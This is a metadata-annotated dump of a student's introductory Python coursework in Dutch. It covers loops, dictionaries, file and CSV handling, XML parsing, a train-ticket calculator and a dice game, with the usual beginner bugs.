"text": "week = ['maandag','dinsdag','woensdag']\nfor dag in week:\n print(dag[0:2])"
},
{
"alpha_fraction": 0.6750115752220154,
"alphanum_fraction": 0.6754751801490784,
"avg_line_length": 52.95000076293945,
"blob_id": "c1b7484ce421b784786c0c38e370151467791ab9",
"content_id": "c06460bd0c7ef60299891ec713a36f29230e06ef",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2157,
"license_type": "no_license",
"max_line_length": 239,
"num_lines": 40,
"path": "/les 10/programming_final_assignment_ns_kaartautomaat.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "def inlezen_beginstation(stations):\n beginstation_input = input('Voer uw begin station in: ')\n while True:\n if beginstation_input in stations:\n print('Het beginstation is ' + str(beginstation_input))\n return beginstation_input\n break\n else:\n print('Dit station it niet in dit traject, controleer uw spelling of vul een geldig station in.')\n beginstation_input = input('Voer uw begin station in: ')\n continue\n\ndef inlezen_eindstation(stations, beginstation):\n eindstation_input = input('Voer uw eind station in: ')\n while True:\n if eindstation_input in stations and stations.index(eindstation_input) > stations.index(beginstation):\n print('Het eindstation is ' + str(eindstation_input))\n return eindstation_input\n break\n else:\n print('Dit station it niet in dit traject, controleer uw spelling of vul een geldig station in.')\n eindstation_input = input('Voer uw eind station in: ')\n continue\n\ndef omroepen_reis(stations, beginstation, eindstation):\n beginnummer = stations.index(beginstation)\n beginnummerzin = 'Het beginstation is ' + str(beginstation) + ' is het ' + str(beginnummer) + 'e station in het traject' + '\\n'\n eindnummer = stations.index(eindstation)\n eindnummerzin = 'Het eindstation is ' + str(eindstation) + ' is het ' + str(eindnummer) + 'e station in het traject' + '\\n'\n afstand = eindnummer - beginnummer\n afstandzin = 'De afstand bedraagd ' + str(afstand) + ' station(s)' + '\\n'\n ritprijs = afstand * 5\n ritprijszin = 'De prijs van het kaartje is ' + str(ritprijs) + ' euro' + '\\n'\n\n print(beginnummerzin,eindnummerzin,afstandzin,ritprijszin)\n\nstations = ['Schagen', 'Heerhugowaard', 'Alkmaar', 'Castricum', 'Zaandam', 'Amsterdam Sloterdijk', 'Amsterdam Centraal', 'Amsterdam Amstel', 'Utrecht Centraal','\\'s-Hertogenbosch', 'Eindhoven', 'Weert', 'Roermond', 'Sittard', 'Maastricht']\nbeginstation = inlezen_beginstation(stations)\neindstation = inlezen_eindstation(stations, beginstation)\nomroepen_reis(stations, beginstation, eindstation)"
},
{
"alpha_fraction": 0.5317604541778564,
"alphanum_fraction": 0.6406533718109131,
"avg_line_length": 25.285715103149414,
"blob_id": "619010d550ff7dbf19610620949eee2dec70dffc",
"content_id": "ff9a9ea662731c642b1bd2d82ca323eeea53e4a3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 551,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 21,
"path": "/les 7/programming_4_files_schrijven.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "file = open('hardlopers.txt', 'a')\nimport datetime\nvandaag = datetime.datetime.today()\ns = vandaag.strftime(\"%a %d %b %Y, %I:%m:%S, \")\n\nklaarinput = 'nee'\ndatatotaal = ''\n\nwhile klaarinput != 'ja':\n naaminput = input('Wat is je naam: ')\n datatotaal += str(s) + str(naaminput) + '\\n'\n file.write(datatotaal)\n klaarinput = input('Ben je klaar?(ja/nee): ')\n\nfile.close()\n\n#Thu 10 Mar 2016, 10:45:52, Miranda\n#Thu 10 Mar 2016, 10:46:04, Piet\n#Thu 10 Mar 2016, 10:47:27, Sacha\n#Thu 10 Mar 2016, 10:48:33, Karel\n#Thu 10 Mar 2016, 10:48:42, Kemal"
},
{
"alpha_fraction": 0.6065163016319275,
"alphanum_fraction": 0.6065163016319275,
"avg_line_length": 29.769229888916016,
"blob_id": "38b71bab83e9eeb1e9f9eb1cf8b58fa363656b8e",
"content_id": "85ae6b9363e0e35bb6be47acfcd70a6275696b41",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 399,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 13,
"path": "/les 10/programming_1_sets.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "bruin = {'Boxtel', 'Best', 'Beukelaan', 'Eindhoven', 'Helmond \\'t hout', 'Helmond', 'Helmond Brouwhuis', 'Duerne'}\ngroen = {'Boxtel', 'Best', 'Beukelaan', 'Eindhoven', 'Geldrop', 'Heeze', 'Weert'}\n\nprint(groen.intersection(bruin))\nprint(groen.difference(bruin))\nprint(groen.union(bruin))\n\n#def overeenkomsten():\n #for i in groen:\n #if i == bruin:\n #print(i , end=', ')\n\n#def verschillen():"
},
{
"alpha_fraction": 0.46979865431785583,
"alphanum_fraction": 0.5906040072441101,
"avg_line_length": 14,
"blob_id": "27047d76f46cff2aaa349701f627eb523549dec8",
"content_id": "8f8b2645f11ced15cfdc9ea1dc32fac9c432d0c8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 149,
"license_type": "no_license",
"max_line_length": 17,
"num_lines": 10,
"path": "/les1en2/Programming_1_Expressions.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "print (5.0)\nprint (type(5.0))\nprint (5%2)\nprint (type(5%2))\nprint (5>1)\nprint (type(5>1))\nprint ('5')\nprint (type('5'))\nprint (5*2)\nprint (type(5*2))"
},
{
"alpha_fraction": 0.6375158429145813,
"alphanum_fraction": 0.6501901149749756,
"avg_line_length": 29.346153259277344,
"blob_id": "ca26a0e35c21c5edb2c84836b5481509b240b710",
"content_id": "8d158ae688a9b80bebe15aba51290af57858f2d7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 789,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 26,
"path": "/les 7/programming_3_files_lezen.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "#file = open(\"kaartnummers.txt\", 'r')\n#inhoud = file.read()\n#regels = inhoud.count('\\n')\n#getal = max(str(inhoud))\n#regels2 = getal.count('\\n') + 1\n#print(inhoud)\n#print('Deze file telt ' + str(regels) + ' regels')\n#print('Het grootste kaartnummer is: ' + str(getal) + ' en dat staat op regel ' + str(regels2))\n\n#file.close()\n\nfile2 = open(\"kaartnummers.txt\")\nlines = file2.readlines()\nfile2.close()\n\nhoogstegetal = 0\nhoogsteregel = -1\n\nfor line in lines:\n currentline = line.split(',')\n getal = eval(currentline[0].strip())\n if getal > hoogstegetal:\n hoogstegetal = getal\n hoogsteregel = lines.index(line) + 1\nprint('Deze file telt ' + str(len(lines)) + ' regels')\nprint('Het grootste kaartnummer is: ' + str(getal) + ' en dat staat op regel ' + str(hoogsteregel))\n"
},
{
"alpha_fraction": 0.5220434069633484,
"alphanum_fraction": 0.6347095966339111,
"avg_line_length": 29.340425491333008,
"blob_id": "097fef0a13b5c4ee79b265f134c7f22ce094764e",
"content_id": "8ba29e6027274cf66731b98174349ad724b7f270",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1429,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 47,
"path": "/les6/programming_finalassignment_nsfuncties.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "def standaardprijs(afstandKM):\n if afstandKM > 50:\n res = 15 + afstandKM*0.6\n else:\n res = afstandKM*0.8\n if res < 0:\n res = 0\n return res\n\ndef ritprijs(leeftijd, weekendrit, afstandKM):\n standaard = (standaardprijs(afstandKM))\n if (weekendrit == False) and (leeftijd < 12 or leeftijd >= 65):\n prijs = standaard * 0.70\n elif (weekendrit == True) and (leeftijd < 12 or leeftijd >= 65):\n prijs = standaard * 0.65\n elif (weekendrit == True) and (leeftijd >= 12 or leeftijd < 65):\n prijs = standaard * 0.60\n else:\n prijs = standaard\n print(prijs)\n\nritprijs(65, False, -1)\n\n#test1 = ritprijs(11, True,45)\n#test2 = ritprijs(12, True,45)\n#test3 = ritprijs(64, True,45)\n#test4 = ritprijs(65, True,45)\n#test5 = ritprijs(11, False,45)\n#test6 = ritprijs(12, False,45)\n#test7 = ritprijs(64, False,45)\n#test8 = ritprijs(65, False,45)\n#test9 = ritprijs(11, True,51)\n#test10 = ritprijs(12, True,51)\n#test11 = ritprijs(64, True,51)\n#test12 = ritprijs(65, True,51)\n#test13 = ritprijs(11, False,51)\n#test14 = ritprijs(12, False,51)\n#test15 = ritprijs(64, False,51)\n#test16 = ritprijs(65, False,51)\n#test17 = ritprijs(11, True, -1)\n#test18 = ritprijs(12, True, -1)\n#test19 = ritprijs(64, True, -1)\n#test20 = ritprijs(65, True, -1)\n#test21 = ritprijs(11, True, -1)\n#test22 = ritprijs(12, False, -1)\n#test23 = ritprijs(64, False, -1)\n#test24 = ritprijs(65, False, -1)\n\n\n\n"
},
{
"alpha_fraction": 0.7710437774658203,
"alphanum_fraction": 0.7710437774658203,
"avg_line_length": 48.66666793823242,
"blob_id": "44dac424c490e27fdc499a1b8dc255e6574d4e1f",
"content_id": "4d7bbec3e29359acfba1c9c11d6f9b7d1fc17dd2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 297,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 6,
"path": "/les1en2/Programming_2_Strings.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "print (len('Supercalifragilisticexpialidocious'))\nprint ('ice' in 'Supercalifragilisticexpialidocious')\nprint ('Antidisestablishmentarianism' > 'Honorificabilitudinitatibus')\nlistname = [\"Berlioz\", \"Borodin\", \"Brian\", \"Bartok\", \"Bellini\", \"Buxtehude\", \"Bernstein\"]\nlistname.sort()\nprint (listname)"
},
{
"alpha_fraction": 0.38989168405532837,
"alphanum_fraction": 0.46209385991096497,
"avg_line_length": 15.352941513061523,
"blob_id": "1f9774a5620b24b1f80060656790120ac85df015",
"content_id": "5483b706e355905bf2ec87a7cc1781eda7c4c83c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 277,
"license_type": "no_license",
"max_line_length": 29,
"num_lines": 17,
"path": "/Les 9/programming_3_dict.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "studenten = {\n 'Yasmara':4.5,\n 'Hellez':9.3,\n 'Jeroen':5.8,\n 'Ehsan':9.0,\n 'Simeon':6.7,\n 'Bruus':9.8,\n 'Dennis':9.9,\n 'Jolanda':3.5,\n 'Henk':5.5,\n}\nhelp = ''\nfor k,v in studenten.items():\n if v > 8.9:\n print(k,v)\n else:\n continue"
},
{
"alpha_fraction": 0.6087499856948853,
"alphanum_fraction": 0.6087499856948853,
"avg_line_length": 35.40909194946289,
"blob_id": "dff25577037bd98fc1238b0fbbe3bcca0b299590",
"content_id": "2230e0c7443bb23720df8ce228dc0036792d9c71",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 800,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 22,
"path": "/Les 11/programming_2_cvs_files_schrijven.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "import datetime\nfrom csv import writer\nvandaag = datetime.datetime.today()\ns = vandaag.strftime(\"%a %d %b %Y, %I:%m, \")\nfp = open(\"inloggers.csv\", \"w\", newline='')\n\ndef inloggen():\n achternaam = input(\"Wat is je achternaam? \")\n voornaam = input(\"Wat zijn je voorletters? \")\n gbdatum = input(\"Wat is je geboortedatum? \")\n email = input(\"Wat is je e-mail adres? \")\n csvwriter = writer(fp)\n while achternaam != 'einde':\n csvwriter.writerow([str(s), str(achternaam), str(voornaam), str(gbdatum), str(email)])\n achternaam = input(\"Wat is je achternaam? \")\n voornaam = input(\"Wat zijn je voorletters? \")\n gbdatum = input(\"Wat is je geboortedatum? \")\n email = input(\"Wat is je e-mail adres? \")\n else:\n fp.close()\n\ninloggen()"
},
{
"alpha_fraction": 0.6159420013427734,
"alphanum_fraction": 0.6231883764266968,
"avg_line_length": 33.5625,
"blob_id": "a8aa6504ca534563a519f5586d70ea45a8bf7e9f",
"content_id": "28ab5dc3a90a69f2e329d75b5231e9edfb0966ad",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 552,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 16,
"path": "/Les 11/programming_3_csv_files_lezen.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "hoogstegetal = 0\nnaam=''\nbehalingsdatum = ''\nwith open('gamers.csv', 'r') as csvreader:\n for regel in csvreader:\n currentline = regel.split(';')\n naamvangetal = currentline[0]\n datumbehalinggetal = currentline[1]\n getal = eval(currentline[2].strip())\n if getal > hoogstegetal:\n hoogstegetal = getal\n naam = naamvangetal\n behalingsdatum = datumbehalinggetal\ncsvreader.close()\n\nprint('De hoogste score is: ' + str(getal) + ' op ' + str(behalingsdatum) + ' behaald door ' + str(naam))"
},
{
"alpha_fraction": 0.552742600440979,
"alphanum_fraction": 0.5801687836647034,
"avg_line_length": 28.6875,
"blob_id": "71506f74f9dece62199149cabdac83a4fb5b2224",
"content_id": "3f9e18f88b09cc4f5ab88813b1a499bd67947e72",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 474,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 16,
"path": "/les 8/programming_3_lists_numbers.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "def lijst():\n invoer = \"5-9-7-1-7-8-3-2-4-8-7-9\"\n list = invoer.split(\"-\")\n list.sort()\n nieuweList = []\n totaal = 0\n for i in list:\n totaal += int(i)\n nieuweList.append(int(i))\n print(\"Gesoorteerde list: \", nieuweList)\n print(\"Het grootste getal is: \", max(list), \"Het kleinste getal is: \", min(list))\n print(\"Aantal getallen: \", len(list), \"en som van de getallen: \", totaal)\n print(\"Gemiddelde: \", totaal / len(list))\n\n\nlijst()"
},
{
"alpha_fraction": 0.5482233762741089,
"alphanum_fraction": 0.5888324975967407,
"avg_line_length": 23.625,
"blob_id": "0557f634918b44594139fa20f9a022fd4092626e",
"content_id": "d24cd41a43b2d52a9c2ba8bd8ede5016f1e5e570",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 197,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 8,
"path": "/les6/programming_5_functie_met_listparameter_en_forloop.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "import math\ndef kwadraten_som(grondgetallen):\n res = 0\n for getal in grondgetallen:\n if getal > 0:\n res = res + (getal**2)\n return res\nprint(kwadraten_som([4,5,3,-81]))\n"
},
{
"alpha_fraction": 0.5837320685386658,
"alphanum_fraction": 0.6028708219528198,
"avg_line_length": 34,
"blob_id": "215a04fbc6f73b6ac0f71b272d13c39808555045",
"content_id": "28daf3f86293b748d783c23dc467714b59d33032",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 209,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 6,
"path": "/les3/Programming_3_tuples.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "letters = ('A', 'C', 'B', 'B', 'C', 'A', 'C', 'C', 'B')\noplossing = (letters.count('A'))\noplossing2 = (letters.count('B'))\noplossing3 = (letters.count('C'))\nlist = [oplossing,oplossing2,oplossing3]\nprint(list)"
},
{
"alpha_fraction": 0.6437908411026001,
"alphanum_fraction": 0.656862735748291,
"avg_line_length": 29.700000762939453,
"blob_id": "ec70551d9c1a2051ad565f92a459a210637d8155",
"content_id": "1559862c8702fcb9739e94328c796808cb0def4a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 306,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 10,
"path": "/Les 9/programming_1_while-loop_numbers.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "invoer = int(input ('Voer een cijfer in: '))\naantal = 0\ngetallenoptelling = 0\nwhile invoer != 0:\n getallenoptelling += invoer\n aantal += 1\n invoer = int(input('Voer een cijfer in: '))\n continue\nelse:\n print(\"Er zijn\" + str(aantal) + \"getallen ingevoerd, de som is:\" + str(getallenoptelling))"
},
{
"alpha_fraction": 0.6553191542625427,
"alphanum_fraction": 0.6553191542625427,
"avg_line_length": 28.375,
"blob_id": "d5a4edd04f6367fc092ad9569b2c180712d09267",
"content_id": "45e9989684bde3f810abaac5ff642ac96981ecc9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 235,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 8,
"path": "/les4/programming_3_input_output.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "uurloon = float(input('Wat verdien je per uur? '))\ngewerkte_uren = float(input('Hoeveel uur heb je gewerkt? '))\n\nloon = (gewerkte_uren * uurloon)\n\nline = (str(gewerkte_uren)+' '+'uur werken levert'+' '+str(loon)+' '+'op')\n\nprint(line)\n"
},
{
"alpha_fraction": 0.6305343508720398,
"alphanum_fraction": 0.6442748308181763,
"avg_line_length": 42.70000076293945,
"blob_id": "48ca0e43bd55604882f3ac216662740162d522fc",
"content_id": "ca711447684ed53e108626c85d72f51726468f66",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1310,
"license_type": "no_license",
"max_line_length": 167,
"num_lines": 30,
"path": "/Les 11/programming_4_csv_files_met_header.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "hoogstegetal = 0\nlaagstegetal = 1000\nduurste = ''\nlaagste = ''\ntotaal = 0\nvoorraad = 0\nwith open('producten.csv', 'r') as csvreader:\n next(csvreader)\n for regel in csvreader:\n currentline = regel.split(';')\n artikelnummer = currentline[0]\n artikelcode = currentline[1]\n naam = currentline[2]\n voorraad = eval(currentline[3])\n prijs = eval(currentline[4].strip())\n totaal += eval(currentline[3])\n uiteindelijk = 'Het totaal van alle producten is ' + str(totaal)\n if prijs > hoogstegetal:\n hoogstegetal = prijs\n duurste = 'Het duurste artikel is ' + str(naam) + ' en het kost ' + str(prijs) + ' euro' + '\\n'\n if voorraad < laagstegetal:\n laagstegetal = voorraad\n laagste = 'Er zijn slechts ' + str(laagstegetal) + ' exemplaren in voorraad van het product met het nummer ' + str(currentline[0]) + '\\n'\ncsvreader.close()\n\nprint(duurste, laagste, uiteindelijk,)\n\n#Duurste artikel naam en prijs -- if duurste getal > duurste duurste = 'Het duurste artikel is' + str(currentline[2]) + ' en het kost ' + str(currentline[4]) + ' euro'\n#kleinste vooraad nummer en artikelnummer -- if getal < laagste getal laagstegetal = getal + currentline[0]\n#tottaalvooraad aan producten -- blabla += currenline[3]"
},
{
"alpha_fraction": 0.7179487347602844,
"alphanum_fraction": 0.7207977175712585,
"avg_line_length": 26.076923370361328,
"blob_id": "4c0c3c8385f3874c54ba9bab67ba9a0b255d8dca",
"content_id": "5e8351ab5d4a10bcccaf5d7522d8d2aa5f76c0cb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 351,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 13,
"path": "/Les 12/Programming_1_XML_schrijven.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "import xmltodict\n\ndef processXML(filename):\n with open(filename) as myXMLfile:\n filecontenstring = myXMLfile.read()\n xmldictonary = xmltodict.parse(filecontenstring)\n return xmldictonary\n\nnamendict = processXML('prog_xml1.xml')\nartikelen = namendict['artikelen']['artikel']\n\nfor artikel in artikelen:\n print(artikel['naam'])"
},
{
"alpha_fraction": 0.47887325286865234,
"alphanum_fraction": 0.48591548204421997,
"avg_line_length": 27.399999618530273,
"blob_id": "9a6a89333b74063949f66952bf106879780a6767",
"content_id": "0ab66d1ff7d59a11f5753a44671832b0d14e79a4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 568,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 20,
"path": "/Les 9/programming_5_dict_functions.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "def namen():\n naam = input('Voer een naam in: ')\n namen = {}\n while naam != '':\n if naam in namen.keys():\n namen[naam] += 1\n else:\n namen[naam] = 1\n naam = input('Voer een naam in: ')\n\n for naam in namen.keys():\n if namen[naam] == 1:\n print('Er is ' + str(namen[naam]) + ' student met de naam ' + str(naam))\n elif namen[naam] > 1:\n print('Er zijn ' + str(namen[naam]) + ' studenten met de naam ' + str(naam))\n else:\n print('Er zijn geen studenten')\n\n\nnamen()\n"
},
{
"alpha_fraction": 0.5656565427780151,
"alphanum_fraction": 0.6565656661987305,
"avg_line_length": 19,
"blob_id": "2b1df913a475081054bf3f2a89ef38d28d1294ef",
"content_id": "00c110f9a1eb53ae85bd24a74bd030d826054b09",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 99,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 5,
"path": "/les6/programming_1_functie_met_drie_parameters.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "def som(getal1,getal2,getal3):\n res = getal1 + getal2 + getal3\n return res\n\nprint(som(5,5,5))"
},
{
"alpha_fraction": 0.649289071559906,
"alphanum_fraction": 0.6729857921600342,
"avg_line_length": 29.285715103149414,
"blob_id": "def13e269e05500912536b42637dc526558c4f75",
"content_id": "524511659f14e81f896a1c7bca2a2a3ef8159266",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 211,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 7,
"path": "/les 7/programming_2_files_lezen.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "file = open(\"kaartnummers.txt\", 'r')\nfor line in file:\n currentline = line.rstrip()\n currentline2 = currentline.split(',')\n print(currentline2[1] + ' heeft kaartnummer ' + currentline2[0])\n\nfile.close()"
},
{
"alpha_fraction": 0.4751131236553192,
"alphanum_fraction": 0.5101810097694397,
"avg_line_length": 33.03845977783203,
"blob_id": "e4f15e96037293c5c018f369b91f55e3ae486044",
"content_id": "09cf76d53a4572bce294df4de6c4884ba498333c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 884,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 26,
"path": "/les 10/programming_2_random.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "import random\n\ndef monopolyworp():\n dobbel1 = random.randrange(1, 2)\n dobbel2 = random.randrange(1, 2)\n totaal = 0\n gooien = ''\n uitkomst = dobbel1 + dobbel2\n while totaal < 3:\n if dobbel1 == dobbel2 and totaal < 2:\n totaal += 1\n gooien += str(dobbel1) + '+' + str(dobbel2) + '=' + str(uitkomst) + '(dubbel)' + '\\n'\n dobbel1 = random.randrange(1, 2)\n dobbel2 = random.randrange(1, 2)\n uitkomst = dobbel1 + dobbel2\n continue\n elif dobbel1 == dobbel2 and totaal == 2:\n gooien += str(dobbel1) + '+' + str(dobbel2) + '=' + str(uitkomst) + '(Je moet naar de gevangenis)' + '\\n'\n print(gooien)\n break\n else:\n gooien += str(dobbel1) + '+' + str(dobbel2) + '=' + str(uitkomst) + '\\n'\n print(gooien)\n break\n\nmonopolyworp()"
},
{
"alpha_fraction": 0.6363636255264282,
"alphanum_fraction": 0.6464646458625793,
"avg_line_length": 27.428571701049805,
"blob_id": "2893260fb0e6570d591ae9d9eef206a9de7310e4",
"content_id": "126c00a4aa28b02fb2fc0e137f643f06c2de20cd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 198,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 7,
"path": "/les5/programming_2_ifwith2booleanoperators.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "leeftijd = int(input(\"Hoe oud ben je? \"))\npaspoort = input(\"Heb je een paspoort; ja/nee? \")\n\nif leeftijd > 17 and paspoort==\"ja\":\n print (\"Je mag stemmen\")\nelse:\n print (\"Je mag niet stemmen\")"
},
{
"alpha_fraction": 0.6521739363670349,
"alphanum_fraction": 0.6598465442657471,
"avg_line_length": 31.66666603088379,
"blob_id": "b64914fc6d99ed480d623d7bc75c474fc2707720",
"content_id": "4d0268339cf0315b696baa83074faabe400c1ca8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 391,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 12,
"path": "/les4/Programming_1_getallen_strings_conversion.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "cijferICOR = float(input('enter cijfer ICOR: '))\ncijferPROG = float(input('enter cijfer PROG: '))\ncijferCSN = float(input('enter cijfer CSN: '))\n\n\ngeld = (cijferPROG+ cijferPROG + cijferICOR) * 30\n\ngemiddelde = (cijferICOR + cijferPROG + cijferCSN) / 3\n\nline = ('Mijn cijfers (gemiddeld een' + \" \" + str(gemiddelde) + \" \" + 'leveren een beloning van' + \" \" + str(geld) + 'op!')\n\nprint (line)"
},
{
"alpha_fraction": 0.6684635877609253,
"alphanum_fraction": 0.6900269389152527,
"avg_line_length": 19.66666603088379,
"blob_id": "e449d89d08e51f2c5ccf27f440cc3e0776794519",
"content_id": "b042526aa30a1c46563135307d4b8627c70b9cea",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 371,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 18,
"path": "/les1en2/Programming_3_Statements_4_BooleanExpressions.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "a = 6\nb = 7\nprint (a)\nprint (b)\nc = ((a+b)/2)\nprint (c)\nvoornaam = 'yasmara'\nachternaam = 'besten'\nprint (voornaam)\nprint (achternaam)\nmijnnaam = (voornaam+' '+achternaam)\nprint (mijnnaam)\n\nprint (75 > a and 75 < b)\nprint (len(mijnnaam) == len(voornaam+achternaam))\ntussenvoegsel = 'niets'\nprint (len(mijnnaam) *5 > len(tussenvoegsel))\nprint (tussenvoegsel in achternaam)"
},
{
"alpha_fraction": 0.5607235431671143,
"alphanum_fraction": 0.5633074641227722,
"avg_line_length": 22.454545974731445,
"blob_id": "5199a0e0a79a6d81c9b872a7e119735cd4c99a3c",
"content_id": "f2e12cefbc4488ad7d5ad5a3656ef7983dbb7bbe",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 774,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 33,
"path": "/Les 9/programming_4_file_dict.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "def ticker(filename):\n tickers = {}\n with open(filename) as file:\n for line in file:\n currentline = line.strip()\n lst = currentline.split(':')\n k = lst[0]\n v = lst[1]\n tickers[k] = v\n return(tickers)\n\n\nticker('afkorting.txt')\n\ndef companyname():\n tickers = ticker('afkorting.txt')\n company_input = input('Enter Company name: ')\n gekregen = tickers.get(company_input, '(onbekend bedrijf)')\n print(gekregen)\n\n\ncompanyname()\n\ndef tickername():\n tickers = ticker('afkorting.txt')\n tickers_input = input('Enter Company ticker: ')\n for k,v in tickers.items():\n if tickers_input == v:\n print(k)\n else:\n print('(onbekend bedrijf)')\n\ntickername()\n"
},
{
"alpha_fraction": 0.6085526347160339,
"alphanum_fraction": 0.6151315569877625,
"avg_line_length": 32.88888931274414,
"blob_id": "92b1ebd30202d5fdff87d20144a085cffce61200",
"content_id": "e1f461f8a60185cb7414464aa37f3fc1efef5394",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 304,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 9,
"path": "/Les 9/programming_2_whileloop_strings.py",
"repo_name": "SilentCeline/Yasmara_besten_V1J_PROGRAMMING",
"src_encoding": "UTF-8",
"text": "woord = input(\"Voer een woord van 4 letters in: \")\nuitvoer = ''\nwhile len(woord) != 4:\n lengte = len(woord)\n print(str(woord) + \" heeft \" + str(lengte) + \" letters\")\n woord = input(\"Voer een woord in: \")\n continue\nelse:\n print(\"Inlezen van correcte string: \" + str(woord) + \" is geslaagd\")"
},
{
"alpha_fraction": 0.5969581604003906,
"alphanum_fraction": 0.6007604598999023,
"avg_line_length": 23,
"blob_id": "569c9bd386e68988aead0265f97f357d7d078f8b",
"content_id": "6a737c1ff9b36f6adcfaccc2daf8d00abd5a0a40",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
